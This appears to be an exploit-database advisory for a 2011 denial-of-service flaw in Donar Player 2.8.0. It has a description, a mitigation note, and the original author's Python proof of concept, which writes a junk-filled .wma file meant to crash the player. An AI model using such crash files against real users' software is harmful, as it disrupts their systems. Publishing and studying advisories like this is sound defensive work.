Donar Player 2.8.0 Denial of Service

vendor:

Donar Player

by:

X-h4ck

7.5

CVSS

HIGH

Denial of Service

N/A

CWE

Product Name: Donar Player

Affected Version From: 2.8.2000

Affected Version To: 2.8.2000

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2011

Donar Player 2.8.0 Denial of Service

Donar Player 2.8.0 is vulnerable to a Denial of Service attack when a specially crafted .wma file is opened and played. The application will crash when the file is opened and played.

Mitigation:

Update to the latest version of Donar Player.

Source

Exploit-DB raw data:

# ########################################
# Title         : Donar Player 2.8.0 Denial of Service
# Software link : http://www.donarzone.com/downloads/donar-player-setup-free.exe , http://www.donarzone.com/donar-player
# Version       : 2.8.0
# Tested on     : Windows XP SP3 English
# Date          : 3/07/2011
# Author        : X-h4ck
# Website       : http://www.pirate.al , # PirateAL Crew @2011 , http://theflashcrew.blogspot.com
# Email         : mem001@live.com
# Greetz        : Wulns~ - IllyrianWarrior - Danzel - Ace - M4yh3m - Saldeath - bi0 - Slimshaddy - d3trimentaL - Lekosta 
# ########################################

#!/usr/bin/python

filename = "crash.wma"

junk = "\x41" * 1337

FILE = open(filename, "w")
FILE.write(junk)
FILE.close()
print " Open", filename, "on Donar Player and play it.. (the application will Crash)"
print " PirateAL Crew"